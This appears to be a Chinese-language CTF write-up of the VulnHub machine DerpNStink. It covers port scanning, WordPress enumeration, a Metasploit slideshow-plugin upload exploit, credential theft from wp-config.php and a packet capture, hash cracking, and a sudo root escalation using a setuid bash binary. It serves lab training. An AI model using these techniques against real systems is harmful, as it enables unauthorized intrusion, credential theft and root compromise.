OSCP - DerpNStink 的破解

本文主要记录对 Lazysysadmin 的渗透学习过程，测试的 VM 主机主要来源 www.vulnhub.com
博客集：面向 CTF 的 OSCP 破解系列
下载链接：DerpNStink

1. 初始安装的虚拟机是不知道IP的，首先需要信息收集发现IP，这里使用 netdiscover

   Currently scanning: 192.168.141.0/16   |   Screen View: Unique Hosts                                                   
                                                                                                                           
    4 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 240                                                        
    _____________________________________________________________________________
      IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
    -----------------------------------------------------------------------------
    10.10.10.2      00:50:56:fb:16:b2      2     120  VMware, Inc.                                                         
    10.10.10.128    00:0c:29:48:44:79      2     120  VMware, Inc. 
   

2. 使用 nmap 进行端口探测

   Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 02:47 EST
   Nmap scan report for 10.10.10.128
   Host is up (0.00041s latency).
   Not shown: 997 closed ports
   PORT   STATE SERVICE VERSION
   21/tcp open  ftp     vsftpd 3.0.2
   22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
   | ssh-hostkey:
   |   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
   |   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
   |   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
   |_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
   80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
   | http-robots.txt: 2 disallowed entries
   |_/php/ /temporary/
   |_http-server-header: Apache/2.4.7 (Ubuntu)
   |_http-title: DeRPnStiNK
   MAC Address: 00:0C:29:48:44:79 (VMware)
   Device type: general purpose
   Running: Linux 3.X|4.X
   OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
   OS details: Linux 3.2 - 4.9
   Network Distance: 1 hop
   Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
   

3. 使用 nmap 扫描发现目标机器打开了 80 端口，访问主页，查看页面源代码发现flag1
   发现flag1：FLAG1（52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166）

4. 下一步使用 dirbuster 进行目录爆破
   

5. 爆破发现 weblog 目录，可以进行访问。看到是 wordpress 网站
   

6. 使用 wpscan 来枚举 wordpress 主题、用户和插件

   root@kali:~# wpscan --enumerate at --enumerate ap --enumerate u --url http://10.10.10.128
   

   wpscan向我们展示了可利用的插件

   我们还发现用户名和密码都是admin

7. 我们使用metasploit来利用此漏洞

   msf > use exploit/unix/webapp/wp_slideshowgallery_upload
   msf exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost 192.168.1.102
   msf exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog
   msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin
   msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin
   msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit
   

   成功拿到 shell
   进入后台查看 wp-config.php 文件中的数据库账号密码

   meterpreter > pwd
   /var/www/html/weblog
   meterpreter > cat wp-config.php
   
   	/** MySQL database username */
   	define('DB_USER', 'root');
   	
   	/** MySQL database password */
   	define('DB_PASSWORD', 'mysql');
   

8. 由于前面使用 dirbuster 爆破出了 phpmyadmin 目录，浏览器远程连接可以看到 wordpress 的另一个账号密码
   使用 john the rapper 进行密码的 hash 值暴破
   暴破出的密码为 wedgie57

9. 使用暴破出的用户名/密码：unclestinky/wedgie57 登录 wordpress
   获取的 flag2 为 flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

10. 查看 /home 下的用户列表查看 /home 下的用户列表
    
    使用 ssh 登录 stinky 发现只能使用密钥登录

11. 在刚才的 meterpreter 中获取 shell 尝试登录 stinky/wedgie57

    meterpreter > shell
    Process 2685 created.
    Channel 2 created.
    python -c 'import pty;pty.spawn("/bin/sh")'
    $ su stinky
    su stinky
    Password: wedgie57
    
    stinky@DeRPnStiNK:/home$ ls
    ls
    mrderp  stinky
    stinky@DeRPnStiNK:/home$
    stinky@DeRPnStiNK:/home$ ls
    ls
    mrderp  stinky
    stinky@DeRPnStiNK:/home$ cd stinky
    cd stinky
    stinky@DeRPnStiNK:~$ ls
    ls
    Desktop  Documents  Downloads  ftp
    stinky@DeRPnStiNK:~$ cd Desktop
    cd Desktop
    stinky@DeRPnStiNK:~/Desktop$ ls
    ls
    flag.txt
    stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
    cat flag.txt
    flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
    
    

登录成功之后枚举系统可以发现 flag.txt 文件。flag3：flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

12. 枚举系统发现 Documents 目录中存在 derpissues.pcap 文件

    stinky@DeRPnStiNK:~$ cd Documents
    cd Documents
    stinky@DeRPnStiNK:~/Documents$ ls
    ls
    derpissues.pcap
    

13. 使用 ftp 登录系统 stinky/wedgie57，下载pcap包
    发现 ftp 的根目录是 files，切换 shell 的路径到 files

    stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
    cat derpissues.txt
    12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
    12:07 stinky: yeah. did you need a password reset?
    12:07 mrderp: I think i accidently deleted my account
    12:07 mrderp: i just need to logon once to make a change
    12:07 stinky: im gonna packet capture so we can figure out whats going on
    12:07 mrderp: that seems a bit overkill, but wtv
    12:08 stinky: commence the sniffer!!!!
    12:08 mrderp: -_-
    12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
    12:11 mrderp: awesome it works!
    12:12 stinky: we really are the best sysadmins #team
    12:13 mrderp: i guess we are...
    12:15 mrderp: alright I made the changes, feel free to decomission my account
    12:20 stinky: done! yay
    

14. 将 derpissues.pcap 复制到 ftp 的根目录以便于下载

    stinky@DeRPnStiNK:~/Documents$ cp derpissues.pcap /home/stinky/ftp/files
    cp derpissues.pcap /home/stinky/ftp/files
    

    下载 pcap 包
    在wireshark中打开它并找到其他用户的密码
    另一个账号的用户名和密码为： mrderp / derpderpderpderpderpderpderp

15. 使用 ssh 连接 mrderp
    登录之后枚举系统发现提示信息
    之后 sudo 切换系统

    mrderp@DeRPnStiNK:~$ ls
    Desktop  Documents  Downloads
    mrderp@DeRPnStiNK:~$ sudo -l
    [sudo] password for mrderp: 
    Matching Defaults entries for mrderp on DeRPnStiNK:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    
    User mrderp may run the following commands on DeRPnStiNK:
        (ALL) /home/mrderp/binaries/derpy*
    

    以上信息 /home/mrderp/binaries/derpy* 中：binaries 目录中的以 derpy 开头的可执行文件具有root权限。创建文件以提权

    mrderp@DeRPnStiNK:~$ mkdir binaries
    mrderp@DeRPnStiNK:~$ ls
    binaries  Desktop  Documents  Downloads
    mrderp@DeRPnStiNK:~$ cd binaries/
    mrderp@DeRPnStiNK:~/binaries$ cat derpy.c 
    	#include<stdio.h>
    	#include<stdlib.h>
    	#include<sys/types.h>
    	#include<unistd.h>
    	int main()
    	{
    		setuid(0);
    		system("/bin/bash");
    		return 0;
    	}
    mrderp@DeRPnStiNK:~/binaries$ gcc derpy.c -o derpy
    mrderp@DeRPnStiNK:~/binaries$ ls
    derpy  derpy.c  derpy.py  derpy.sh
    mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy 
    [sudo] password for mrderp: 
    root@DeRPnStiNK:~/binaries# id
    uid=0(root) gid=0(root) groups=0(root)
    

    或者使用如下方法：

    mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh 
    	#!/bin/bash
    	bash -i
    mrderp@DeRPnStiNK:~/binaries$ chmod +x derpy.sh 
    mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh 
    root@DeRPnStiNK:~/binaries# 
    

    获取flag4：

    root@DeRPnStiNK:~/binaries# cd /root/Desktop/
    root@DeRPnStiNK:/root/Desktop# ls
    flag.txt
    root@DeRPnStiNK:/root/Desktop# cat flag.txt 
    flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
    Congrats on rooting my first VulnOS!
    Hit me up on twitter and let me know your thoughts!
    @securekomodo